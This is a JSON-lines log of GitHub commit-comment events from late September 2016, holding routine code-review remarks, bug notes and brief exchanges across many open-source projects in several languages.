{"id":"4644683586","type":"CommitCommentEvent","actor":{"login":"MessyMix"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19244648,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T17:10:44Z","updated_at":"2016-09-30T17:10:44Z","body":"I realize that, but what I'm saying is the new name \"Korath Nanobots\" is ambiguous as to their creator. If new faction were called \"Mereti Nanobots\" or something that hints at their being Mereti's creation, then it would be kinda cool. If you're on good terms with the Kor Mereti, the \"Mereti Nanobots\" or whatever are still going to be hostile."}},"created_at":"2016-09-30T17:10:44Z"}
{"id":"4644686269","type":"CommitCommentEvent","actor":{"login":"alexstophel"},"repo":{"name":"ralexr22/open_todo_api"},"payload":{"comment":{"id":19244656,"position":7,"line":17,"path":"app/controllers/api/lists_controller.rb","commit_id":"03ecf7c8c89796449ba0b368a4deae3fadd4f026","created_at":"2016-09-30T17:11:18Z","updated_at":"2016-09-30T17:11:18Z","body":"Since we're looking up `user` already, it might make sense to \"scope\" the list to the user. I.e, `user.lists.find(params[:id])` instead of `List.find(params[:id])`"}},"created_at":"2016-09-30T17:11:18Z"}
{"id":"4644687366","type":"CommitCommentEvent","actor":{"login":"jloguercio"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19244659,"position":51,"line":66,"path":"whoisonline.php","commit_id":"72eadfc8f85c67ad3c9e4e534c0d26ea0f66b21c","created_at":"2016-09-30T17:11:31Z","updated_at":"2016-09-30T17:11:31Z","body":"explicame este cambio apartir de esta linea"}},"created_at":"2016-09-30T17:11:31Z"}
{"id":"4644688517","type":"CommitCommentEvent","actor":{"login":"jloguercio"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19244663,"position":73,"line":28,"path":"whoisonline.php","commit_id":"72eadfc8f85c67ad3c9e4e534c0d26ea0f66b21c","created_at":"2016-09-30T17:11:45Z","updated_at":"2016-09-30T17:11:45Z","body":"hasta aca"}},"created_at":"2016-09-30T17:11:45Z"}
{"id":"4644690440","type":"CommitCommentEvent","actor":{"login":"mlocati"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":19244670,"position":null,"line":null,"path":null,"commit_id":"a3f0e4bfc080e992bd2cc4765c5fc496c04da6ea","created_at":"2016-09-30T17:12:09Z","updated_at":"2016-09-30T17:12:09Z","body":"I agree, instead of making it static, I should have fixed the places where it was called statically (eg `\\Concrete\\Core\\Package\\PackageService::getClass(...)`)"}},"created_at":"2016-09-30T17:12:09Z"}
{"id":"4644692722","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19244676,"position":null,"line":null,"path":null,"commit_id":"f3e39923b93052f967dada9c7879d2d38d053dc8","created_at":"2016-09-30T17:12:34Z","updated_at":"2016-09-30T17:12:34Z","body":"I understand the logic of simplificating the code, but calling NineUnknown_QueryInterface everytime seems less efficient than the previous code. And the code is not that much simplified."}},"created_at":"2016-09-30T17:12:34Z"}
{"id":"4644693446","type":"CommitCommentEvent","actor":{"login":"DrZed"},"repo":{"name":"HxCKDMS/HxCCore"},"payload":{"comment":{"id":19244680,"position":null,"line":null,"path":null,"commit_id":"db521fc6302a98d4af7e80998d89652fc722f437","created_at":"2016-09-30T17:12:44Z","updated_at":"2016-09-30T17:12:44Z","body":"*Correction you broke chat\r\n% color"}},"created_at":"2016-09-30T17:12:44Z"}
{"id":"4644694942","type":"CommitCommentEvent","actor":{"login":"khilman"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19244685,"position":109,"line":109,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T17:13:04Z","updated_at":"2016-09-30T17:13:04Z","body":"Do you know it works on meson8?  If not, maybe leave it out for now."}},"created_at":"2016-09-30T17:13:04Z"}
{"id":"4644696397","type":"CommitCommentEvent","actor":{"login":"PhVerkerk"},"repo":{"name":"biblissima/collatinus"},"payload":{"comment":{"id":19244693,"position":null,"line":null,"path":null,"commit_id":"406f32c6fe6e073f7d0a41ca2d8d8e916af61d12","created_at":"2016-09-30T17:13:22Z","updated_at":"2016-09-30T17:13:22Z","body":"Je vois que je viens de faire 2 758 changements dans lem_ext.la. Peut-être faux !!!"}},"created_at":"2016-09-30T17:13:22Z"}
{"id":"4644697798","type":"CommitCommentEvent","actor":{"login":"christophermancini"},"repo":{"name":"basho/riak-ruby-client"},"payload":{"comment":{"id":19244699,"position":5,"line":18,"path":"spec/integration/riak/encodings/crdt_spec.rb","commit_id":"cbf338816dbda89a773a9ff885dc9ba14a1c66a8","created_at":"2016-09-30T17:13:41Z","updated_at":"2016-09-30T17:13:41Z","body":"Will do."}},"created_at":"2016-09-30T17:13:41Z"}
{"id":"4644700266","type":"CommitCommentEvent","actor":{"login":"khilman"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19244704,"position":178,"line":178,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T17:14:12Z","updated_at":"2016-09-30T17:14:12Z","body":"nit: looks like spaces vs tabs issue"}},"created_at":"2016-09-30T17:14:12Z"}
{"id":"4644700645","type":"CommitCommentEvent","actor":{"login":"Steven-N-Hart"},"repo":{"name":"Steven-N-Hart/bior_annotate"},"payload":{"comment":{"id":19244705,"position":null,"line":null,"path":null,"commit_id":"9a8e84fa27e2d7a262a66d0b920cba0e8aff9d58","created_at":"2016-09-30T17:14:17Z","updated_at":"2016-09-30T17:14:17Z","body":"Solves issue #10 "}},"created_at":"2016-09-30T17:14:17Z"}
{"id":"4644701188","type":"CommitCommentEvent","actor":{"login":"seesharprun"},"repo":{"name":"MicrosoftLearning/20532-DevelopingMicrosoftAzureSolutions"},"payload":{"comment":{"id":19244707,"position":null,"line":null,"path":null,"commit_id":"1b5c1a94e843387bcd02b4e4e7da454bfdbb6c1b","created_at":"2016-09-30T17:14:22Z","updated_at":"2016-09-30T17:14:22Z","body":"You should be able to make another commit in your branch. Once you do this, it will automatically show up in the Pull Request"}},"created_at":"2016-09-30T17:14:22Z"}
{"id":"4644707524","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19244720,"position":null,"line":null,"path":null,"commit_id":"66ae6202b681dc86831e7723ef639acc54dd2f00","created_at":"2016-09-30T17:15:25Z","updated_at":"2016-09-30T17:15:25Z","body":"Finally it builds, blame recastnavigation!!"}},"created_at":"2016-09-30T17:15:25Z"}
{"id":"4644708621","type":"CommitCommentEvent","actor":{"login":"LraiZer"},"repo":{"name":"UkCvs/commando"},"payload":{"comment":{"id":19244723,"position":null,"line":null,"path":null,"commit_id":"9c5a42aa08d5e9c6fc29209ddd90046c77e1f28e","created_at":"2016-09-30T17:15:39Z","updated_at":"2016-09-30T17:15:39Z","body":"It is only a symlink, if it breaks the build, we can revert the commit?"}},"created_at":"2016-09-30T17:15:39Z"}
{"id":"4644709216","type":"CommitCommentEvent","actor":{"login":"garricko"},"repo":{"name":"Bachmann1234/java9_kernel"},"payload":{"comment":{"id":19244724,"position":null,"line":null,"path":null,"commit_id":"bbbbefc5dcd869148ed7f5577924d2ac0598ff72","created_at":"2016-09-30T17:15:47Z","updated_at":"2016-09-30T17:15:47Z","body":"It just seems to hang indefinitely. I see these errors on startup, but they might be unrelated:\r\n\r\n```\r\nKernel started: ...\r\njava version \"9-ea\"\r\nJava(TM) SE Runtime Environment (build 9-ea+137)\r\nJava HotSpot(TM) 64-Bit Server VM (build 9-ea+137, mixed mode)\r\n[IPKernelApp] ERROR | UNKNOWN MESSAGE TYPE: 'comm_open'\r\n[IPKernelApp] ERROR | UNKNOWN MESSAGE TYPE: 'comm_open'\r\n```\r\n\r\nFrom the stack trace when I interrupt it:\r\n\r\n```\r\nKernel interrupted: ...\r\n[IPKernelApp] ERROR | Exception in message handler:\r\nTraceback (most recent call last):\r\n  File \".../java9_kernel/javakernel/kernel.py\", line 88, in _execute_java\r\n    output = self.javawrapper.run_command(code.rstrip(), timeout=None)\r\n  File \".../anaconda/lib/python3.5/site-packages/pexpect/replwrap.py\", line 95, in run_command\r\n    if self._expect_prompt(timeout=timeout) == 1:\r\n  File \".../anaconda/lib/python3.5/site-packages/pexpect/replwrap.py\", line 66, in _expect_prompt\r\n    timeout=timeout)\r\n  File \".../anaconda/lib/python3.5/site-packages/pexpect/spawnbase.py\", line 384, in expect_exact\r\n    return exp.expect_loop(timeout)\r\n  File \".../anaconda/lib/python3.5/site-packages/pexpect/expect.py\", line 97, in expect_loop\r\n    incoming = spawn.read_nonblocking(spawn.maxread, timeout)\r\n  File \".../anaconda/lib/python3.5/site-packages/pexpect/pty_spawn.py\", line 442, in read_nonblocking\r\n    r, w, e = self.__select([self.child_fd], [], [], timeout)\r\n  File \".../anaconda/lib/python3.5/site-packages/pexpect/pty_spawn.py\", line 806, in __select\r\n    return select.select(iwtd, owtd, ewtd, timeout)\r\nKeyboardInterrupt\r\n```"}},"created_at":"2016-09-30T17:15:47Z"}
{"id":"4644712368","type":"CommitCommentEvent","actor":{"login":"khilman"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19244731,"position":227,"line":227,"path":"drivers/irqchip/irq-meson-gpio.c","commit_id":"0ded35dff70abf1f0344c4a2c34163c60ab24a44","created_at":"2016-09-30T17:16:28Z","updated_at":"2016-09-30T17:16:28Z","body":"I would also separate out the IRQ_EDGE_BOTH hack as it's own patch, with the arguments in the changelog and the code."}},"created_at":"2016-09-30T17:16:28Z"}
{"id":"4644713769","type":"CommitCommentEvent","actor":{"login":"Lineth"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19244737,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T17:16:45Z","updated_at":"2016-09-30T17:16:45Z","body":"I think he means the nanites are not associated with the Mereti at all."}},"created_at":"2016-09-30T17:16:45Z"}
{"id":"4644716232","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19244741,"position":32,"line":29,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T17:17:15Z","updated_at":"2016-09-30T17:17:15Z","body":"Sul campo mi piace un po' di più, anche se mi sembra ancora più vago rispetto a \"comunità\". \"Gente comune\" lo eviterei, mi sembra molto paternalistico.\r\nGli strumenti sicuramente non sono intesi unicamente quelli per l'alfabetizzazione web, ma anche quelli per la privacy, la sicurezza, la libertà di scelta e tutte le altre iniziative Mozilla.\r\nIl punto che volevo sottolineare io è che, piuttosto di un vago \"strumenti\" lasciato lì senza spiegazioni, suona meglio legarlo all'alfabetizzazione, anche se restringe un po' il campo.\r\nUn'altra motivazione per cui ho voluto accorpare i due concetti è che la frase è già parecchio lunga.\r\nPerò, se preferisci, si può aggiungere invece di togliere e diventerebbe una cosa tipo: \r\ninsegnamo l’alfabetizzazione web, forniamo strumenti per rendere l'utente protagonista della sua vita online e difendiamo i diritti di tutti coloro che credono nei valori di equità, inclusione e rispetto reciproco.\r\n(o simili)\r\n"}},"created_at":"2016-09-30T17:17:15Z"}
{"id":"4644716421","type":"CommitCommentEvent","actor":{"login":"dallaswinger"},"repo":{"name":"aopp/Android-Terminal-Emulator"},"payload":{"comment":{"id":19244743,"position":33,"line":33,"path":"term/src/main/java/jackpal/androidterm/Exiter.java","commit_id":"f7efc0a390c58f3dad49b590fef8de9a0c30ec46","created_at":"2016-09-30T17:17:18Z","updated_at":"2016-09-30T17:17:18Z","body":"I need to fix this line."}},"created_at":"2016-09-30T17:17:18Z"}
{"id":"4644722935","type":"CommitCommentEvent","actor":{"login":"khilman"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19244766,"position":26,"line":896,"path":"drivers/pinctrl/meson/pinctrl-meson8b.c","commit_id":"9a36e4d3cb2799bdee493cb0cbdd3167e931dcc1","created_at":"2016-09-30T17:18:25Z","updated_at":"2016-09-30T17:18:25Z","body":"Should probably be a comment in the code."}},"created_at":"2016-09-30T17:18:25Z"}
{"id":"4644723085","type":"CommitCommentEvent","actor":{"login":"marczeo"},"repo":{"name":"gmelen/GraysSportsAlmanac"},"payload":{"comment":{"id":19244768,"position":null,"line":null,"path":null,"commit_id":"5739a285fc8e985beca7b97ea86e842a7c3647f1","created_at":"2016-09-30T17:18:27Z","updated_at":"2016-09-30T17:18:27Z","body":"@gmelen por favor revisa esta parte al momento de crear una nueva racha, desde hace tiempo faltaba \"inicializar\" cosas, ya las puse, solo necesito que veas que el flujo continúe con normalidad."}},"created_at":"2016-09-30T17:18:27Z"}
{"id":"4644723120","type":"CommitCommentEvent","actor":{"login":"Bachmann1234"},"repo":{"name":"Bachmann1234/java9_kernel"},"payload":{"comment":{"id":19244769,"position":null,"line":null,"path":null,"commit_id":"bbbbefc5dcd869148ed7f5577924d2ac0598ff72","created_at":"2016-09-30T17:18:27Z","updated_at":"2016-09-30T17:18:27Z","body":"Ill try and poke at it sometime in the next day or so and see if there is something I can send your way"}},"created_at":"2016-09-30T17:18:27Z"}
{"id":"4644723391","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19244773,"position":null,"line":null,"path":null,"commit_id":"f284bab10650c254b18cc09abced49003a7498b5","created_at":"2016-09-30T17:18:31Z","updated_at":"2016-09-30T17:18:31Z","body":"Title could be more explicit"}},"created_at":"2016-09-30T17:18:31Z"}
{"id":"4644726014","type":"CommitCommentEvent","actor":{"login":"omgmog"},"repo":{"name":"cardboctober/cardboctober.github.io"},"payload":{"comment":{"id":19244783,"position":null,"line":null,"path":null,"commit_id":"53e5ad4d66971e70f785511030133e057ae74487","created_at":"2016-09-30T17:19:03Z","updated_at":"2016-09-30T17:19:03Z","body":"Details!"}},"created_at":"2016-09-30T17:19:03Z"}
{"id":"4644731046","type":"CommitCommentEvent","actor":{"login":"GerardoNille"},"repo":{"name":"gmelen/GraysSportsAlmanac"},"payload":{"comment":{"id":19244796,"position":null,"line":null,"path":null,"commit_id":"e21ad55f212ac407a74947797c77f825f5aa7379","created_at":"2016-09-30T17:20:05Z","updated_at":"2016-09-30T17:20:05Z","body":"@marczeo Hola"}},"created_at":"2016-09-30T17:20:05Z"}
{"id":"4644732638","type":"CommitCommentEvent","actor":{"login":"SatSearching"},"repo":{"name":"UkCvs/commando"},"payload":{"comment":{"id":19244801,"position":null,"line":null,"path":null,"commit_id":"9c5a42aa08d5e9c6fc29209ddd90046c77e1f28e","created_at":"2016-09-30T17:20:23Z","updated_at":"2016-09-30T17:20:23Z","body":"Are you Lunar perchance AL?"}},"created_at":"2016-09-30T17:20:23Z"}
{"id":"4644733460","type":"CommitCommentEvent","actor":{"login":"fifiteen82726"},"repo":{"name":"fifiteen82726/TaiwanDigger"},"payload":{"comment":{"id":19244802,"position":15,"line":32,"path":"app/controllers/taiwan_digger_controller.rb","commit_id":"a14f438f2b1deda923dba1fbb71b8e734d2cb3db","created_at":"2016-09-30T17:20:33Z","updated_at":"2016-09-30T17:20:33Z","body":"includes(:tag)"}},"created_at":"2016-09-30T17:20:33Z"}
{"id":"4644735329","type":"CommitCommentEvent","actor":{"login":"benwilson512"},"repo":{"name":"CargoSense/ex_aws"},"payload":{"comment":{"id":19244808,"position":17,"line":132,"path":"lib/ex_aws/auth.ex","commit_id":"e0ea7dfd6f9e9bd3effbcef804755bd5d8d2e810","created_at":"2016-09-30T17:20:55Z","updated_at":"2016-09-30T17:20:55Z","body":"My bigger question is why are we doing this at all? Why might this function get a binary at all that we have to manually parse. If it gets a binary then that tells me we're encoding to a binary too soon."}},"created_at":"2016-09-30T17:20:55Z"}
{"id":"4644736259","type":"CommitCommentEvent","actor":{"login":"fifiteen82726"},"repo":{"name":"fifiteen82726/TaiwanDigger"},"payload":{"comment":{"id":19244809,"position":null,"line":null,"path":null,"commit_id":"a14f438f2b1deda923dba1fbb71b8e734d2cb3db","created_at":"2016-09-30T17:21:08Z","updated_at":"2016-09-30T17:21:08Z","body":"排版是 indent 2"}},"created_at":"2016-09-30T17:21:08Z"}
{"id":"4644736805","type":"CommitCommentEvent","actor":{"login":"agriffis"},"repo":{"name":"scampersand/sonos-front"},"payload":{"comment":{"id":19244810,"position":null,"line":null,"path":null,"commit_id":"d7e92246a0dfc08212759e1f832fcd9235f61be7","created_at":"2016-09-30T17:21:13Z","updated_at":"2016-09-30T17:21:13Z","body":"another flexbox addict in the making"}},"created_at":"2016-09-30T17:21:13Z"}
{"id":"4644738286","type":"CommitCommentEvent","actor":{"login":"fifiteen82726"},"repo":{"name":"fifiteen82726/TaiwanDigger"},"payload":{"comment":{"id":19244818,"position":3,"line":3,"path":"app/controllers/taiwan_digger_controller.rb","commit_id":"a14f438f2b1deda923dba1fbb71b8e734d2cb3db","created_at":"2016-09-30T17:21:32Z","updated_at":"2016-09-30T17:21:32Z","body":"排版怎麼又變回4了"}},"created_at":"2016-09-30T17:21:32Z"}
{"id":"4644739878","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19244825,"position":56,"line":56,"path":"React/Base/RCTBundleURLProvider.m","commit_id":"3ccd99fb5399995e476f9b57802d7651179b5752","created_at":"2016-09-30T17:21:48Z","updated_at":"2016-09-30T17:21:48Z","body":"@nathanajah \r\n\r\nWhat's the default timeout on this?\r\n\r\nMight want to use a semaphore and `RCTLogError`.\r\n\r\nOtherwise the user is left confused (since the blocking request stalls the thread)."}},"created_at":"2016-09-30T17:21:48Z"}
{"id":"4644740851","type":"CommitCommentEvent","actor":{"login":"Pixel-Pirate"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19244828,"position":null,"line":null,"path":null,"commit_id":"40d24da092a293a3323e8a0e992e755e3e3d5506","created_at":"2016-09-30T17:22:00Z","updated_at":"2016-09-30T17:22:00Z","body":"nice work , very clean ;)"}},"created_at":"2016-09-30T17:22:00Z"}
{"id":"4644742136","type":"CommitCommentEvent","actor":{"login":"endless-sky"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19244831,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T17:22:15Z","updated_at":"2016-09-30T17:22:15Z","body":"You can't actually view their government name in-game, and there's no way for the player to know which faction created them anyway - are they a Mereti experiment that got out of control? Or a Sestor weapon used against the Mereti? Or were they created by the exile faction before they got exiled?"}},"created_at":"2016-09-30T17:22:15Z"}
{"id":"4644742848","type":"CommitCommentEvent","actor":{"login":"KirillMysnik"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19244832,"position":null,"line":null,"path":null,"commit_id":"9c444775739566f37667e12dee482aa2e8d23a0d","created_at":"2016-09-30T17:22:23Z","updated_at":"2016-09-30T17:22:23Z","body":"Will fail if somebody strips `FL_FAKECLIENT` off from the player: http://forums.sourcepython.com/viewtopic.php?p=6427#p6427"}},"created_at":"2016-09-30T17:22:23Z"}
{"id":"4644748090","type":"CommitCommentEvent","actor":{"login":"Raxe88"},"repo":{"name":"Raxe88/GUILOVECAT"},"payload":{"comment":{"id":19244847,"position":null,"line":null,"path":null,"commit_id":"a30c8aabd4106b665bdce0ee16e79a132a219264","created_at":"2016-09-30T17:23:24Z","updated_at":"2016-09-30T17:23:24Z","body":"Used this:\r\n\r\nhttps://forums.coronalabs.com/topic/38127-how-to-call-a-function-from-another-lua-file/"}},"created_at":"2016-09-30T17:23:24Z"}
{"id":"4644749776","type":"CommitCommentEvent","actor":{"login":"msprotz"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":19244852,"position":null,"line":null,"path":null,"commit_id":"7d9607f15fcb2c21bca7ffcbdc0758ce73de2df8","created_at":"2016-09-30T17:23:46Z","updated_at":"2016-09-30T17:23:46Z","body":"@polubelova https://github.com/FStarLang/FStar/wiki/Writing-code-in-the-intersection-of-F%E2%98%85%2C-F%23-and-OCaml should help -- please edit if you find out something that hasn't been mentioned in there"}},"created_at":"2016-09-30T17:23:46Z"}
{"id":"4644750890","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19244854,"position":45,"line":392,"path":"src/gallium/state_trackers/nine/nine_pipe.h","commit_id":"98110d78cf2a214f8cba646a390328da0f4bb512","created_at":"2016-09-30T17:24:01Z","updated_at":"2016-09-30T17:24:01Z","body":"Problem is different formats could support different multisample levels.\r\nOn radeon that doesn't seem to be a problem. I don't know for nouveau.\r\nI suggest to either:\r\n. Write the assumption as comment (after checking nouveau)\r\n. List at adapter creation the different levels supported by X8R8G8B8, and use these ones as reference."}},"created_at":"2016-09-30T17:24:01Z"}
{"id":"4644752427","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19244857,"position":null,"line":null,"path":null,"commit_id":"cab7b562d8dec756d925380162f47a93f1e5e0eb","created_at":"2016-09-30T17:24:21Z","updated_at":"2016-09-30T17:24:21Z","body":"Some info on tunable IIR filters: \r\nhttps://www.mathworks.com/help/dsp/ref/dsp.notchpeakfilter-class.html\r\neeweb.poly.edu/iselesni/EL713/zoom/Ch6(3).ppt\r\n\r\n"}},"created_at":"2016-09-30T17:24:21Z"}
{"id":"4644752468","type":"CommitCommentEvent","actor":{"login":"lindskogen"},"repo":{"name":"cthdidIT/itbio"},"payload":{"comment":{"id":19244860,"position":5,"line":48,"path":"frontend/src/components/loader/index.js","commit_id":"0571bb25d049aa28b45bc69b366e839d7c5ea922","created_at":"2016-09-30T17:24:22Z","updated_at":"2016-09-30T17:24:22Z","body":"true dat"}},"created_at":"2016-09-30T17:24:22Z"}
{"id":"4644756639","type":"CommitCommentEvent","actor":{"login":"ln-zookeeper"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19244875,"position":null,"line":null,"path":null,"commit_id":"fe2e119b251dd2c732fe0d20d08ac1ac61f836d2","created_at":"2016-09-30T17:25:14Z","updated_at":"2016-09-30T17:25:14Z","body":"Reservoir is a word. Reservior is not a word. It was truly a typo."}},"created_at":"2016-09-30T17:25:14Z"}
{"id":"4644756684","type":"CommitCommentEvent","actor":{"login":"christophermancini"},"repo":{"name":"basho/riak-ruby-client"},"payload":{"comment":{"id":19244876,"position":null,"line":null,"path":null,"commit_id":"2273acd88a961ebc705677ddf2a270d61510c800","created_at":"2016-09-30T17:25:15Z","updated_at":"2016-09-30T17:25:15Z","body":":+1"}},"created_at":"2016-09-30T17:25:15Z"}
{"id":"4644762661","type":"CommitCommentEvent","actor":{"login":"WGathagu"},"repo":{"name":"pittgikera/MovieApp"},"payload":{"comment":{"id":19244896,"position":null,"line":null,"path":null,"commit_id":"de706e5bd33db2b8d650bf0d5278d1546f7d77e8","created_at":"2016-09-30T17:26:30Z","updated_at":"2016-09-30T17:26:30Z","body":"A small error fix"}},"created_at":"2016-09-30T17:26:30Z"}
{"id":"4644764323","type":"CommitCommentEvent","actor":{"login":"jloguercio"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19244899,"position":null,"line":null,"path":null,"commit_id":"72eadfc8f85c67ad3c9e4e534c0d26ea0f66b21c","created_at":"2016-09-30T17:26:50Z","updated_at":"2016-09-30T17:26:50Z","body":"Arreglado aquí : https://github.com/chamilo/chamilo-lms/pull/1421"}},"created_at":"2016-09-30T17:26:50Z"}
{"id":"4644767074","type":"CommitCommentEvent","actor":{"login":"taweesakteejantuk66"},"repo":{"name":"JmzSoftware/ParseHTMLTextview"},"payload":{"comment":{"id":19244904,"position":null,"line":null,"path":null,"commit_id":"856e20751b894d9d6e44379429c9cc67448e0267","created_at":"2016-09-30T17:27:25Z","updated_at":"2016-09-30T17:27:25Z","body":"good"}},"created_at":"2016-09-30T17:27:25Z"}
{"id":"4644771050","type":"CommitCommentEvent","actor":{"login":"jstebbins"},"repo":{"name":"HandBrake/HandBrake"},"payload":{"comment":{"id":19244913,"position":null,"line":null,"path":null,"commit_id":"d3985316111dc8c995bd1e2fe6dcfc700ea30d0b","created_at":"2016-09-30T17:28:16Z","updated_at":"2016-09-30T17:28:16Z","body":"There are basically 2 \"bugs\" in the x265 2.1 release.  First, their repo info file $(TOP)/.hg_archive.txt has been populated differently than the last release.  Not sure if this was intentional, or some error in their release process.  Second, the cmake script source/cmake/version.cmake appears to initially construct a proper X265_VERSION from \"latesttag\" that it sees in .hg_archive.txt.  Then at the very end of the file, it overwrites this correct version info with 0.0.  I think the error here is that they really meant to set X265_LATEST_TAG where they set X265_VERSION.\r\n\r\nAnyway, upstream bug(s)"}},"created_at":"2016-09-30T17:28:16Z"}
{"id":"4644771357","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19244916,"position":null,"line":null,"path":null,"commit_id":"49b261c460b4a486e30e1b1e50e9b2193a128b93","created_at":"2016-09-30T17:28:20Z","updated_at":"2016-09-30T17:28:20Z","body":"The nine way of doing such things is to introduce states like \"NINED3DSAMP_SHADOW\".\r\n\r\nHow would it fit there ?\r\nIf really it doesn't make sense, then ok for your solution, but we should favor the state solution."}},"created_at":"2016-09-30T17:28:20Z"}
{"id":"4644774717","type":"CommitCommentEvent","actor":{"login":"nickolasnikolic"},"repo":{"name":"Raptor-Fics-Interface/Raptor"},"payload":{"comment":{"id":19244924,"position":null,"line":null,"path":null,"commit_id":"7be80c8c5af662f59081c0948a5f46ba242b8d1a","created_at":"2016-09-30T17:29:03Z","updated_at":"2016-09-30T17:29:03Z","body":"mispelling in this release. Windows three-quarters way down."}},"created_at":"2016-09-30T17:29:03Z"}
{"id":"4644787784","type":"CommitCommentEvent","actor":{"login":"martinbudden"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19244950,"position":null,"line":null,"path":null,"commit_id":"cab7b562d8dec756d925380162f47a93f1e5e0eb","created_at":"2016-09-30T17:31:40Z","updated_at":"2016-09-30T17:31:40Z","body":"Presumably noise frequency is related to motor rotation speed, not throttle value. (Relationship between throttle and motor rpm won't be linear). So if you have ESC telemetry which gives motor speed you could use this to adjust the filter."}},"created_at":"2016-09-30T17:31:40Z"}
{"id":"4644794544","type":"CommitCommentEvent","actor":{"login":"van562"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19244965,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T17:33:06Z","updated_at":"2016-09-30T17:33:06Z","body":"Hey Andrea,\r\nThank you so much for the help. I'm going to do some research on the information that you provided to me. "}},"created_at":"2016-09-30T17:33:06Z"}
{"id":"4644808635","type":"CommitCommentEvent","actor":{"login":"martin-heralecky"},"repo":{"name":"martin-heralecky/edit"},"payload":{"comment":{"id":19245003,"position":20,"line":285,"path":"src/editor.cpp","commit_id":"036b807c09516da92edbbe886b5cc9d036da2f03","created_at":"2016-09-30T17:35:57Z","updated_at":"2016-09-30T17:35:57Z","body":"This code is repeating - exactly the same as in the Key_Backspace block above."}},"created_at":"2016-09-30T17:35:57Z"}
{"id":"4644813989","type":"CommitCommentEvent","actor":{"login":"daithiocrualaoich"},"repo":{"name":"amysimmons/cs_challenges"},"payload":{"comment":{"id":19245012,"position":null,"line":null,"path":null,"commit_id":"b8765477df3aad71afeb2a43063c11f0ed9ebf31","created_at":"2016-09-30T17:37:00Z","updated_at":"2016-09-30T17:37:00Z","body":"+1 Nailed it!"}},"created_at":"2016-09-30T17:37:00Z"}
{"id":"4644814477","type":"CommitCommentEvent","actor":{"login":"atchertchian"},"repo":{"name":"nuxeo/nuxeo-csv"},"payload":{"comment":{"id":19245016,"position":13,"line":123,"path":"src/test/java/org/nuxeo/ecm/csv/TestCSVImport.java","commit_id":"3e5a3cade76edf282fe8c8a04231306dbd65cdc7","created_at":"2016-09-30T17:37:06Z","updated_at":"2016-09-30T17:37:06Z","body":"Because these tests are for the non-default \"import\" mode: it used to be activated on this test by configuration property, and was changed to be set by the caller code instead (so that user can chose the mode in the UI for instance)"}},"created_at":"2016-09-30T17:37:06Z"}
{"id":"4644819337","type":"CommitCommentEvent","actor":{"login":"atchertchian"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19245033,"position":25,"line":105,"path":"nuxeo-services/nuxeo-platform-login-shibboleth/src/main/java/org/nuxeo/ecm/platform/shibboleth/service/ShibbolethAuthenticationServiceImpl.java","commit_id":"76e5f6e30f54ca2978fbc961994c1e9c8a4ddac0","created_at":"2016-09-30T17:38:04Z","updated_at":"2016-09-30T17:38:04Z","body":"+1"}},"created_at":"2016-09-30T17:38:04Z"}
{"id":"4644823884","type":"CommitCommentEvent","actor":{"login":"gbaumgart"},"repo":{"name":"mcollina/mosca"},"payload":{"comment":{"id":19245050,"position":null,"line":null,"path":null,"commit_id":"ab4b35dc3bf27f224af4db244c1db02bd1620d4b","created_at":"2016-09-30T17:38:59Z","updated_at":"2016-09-30T17:38:59Z","body":"didnt test yet but are sure that will not crash the whole app ? when looking at the stack trace, the problem seems much deeper than this. \r\n\r\nanyhow, thanks for now. will test this tomorrow."}},"created_at":"2016-09-30T17:38:59Z"}
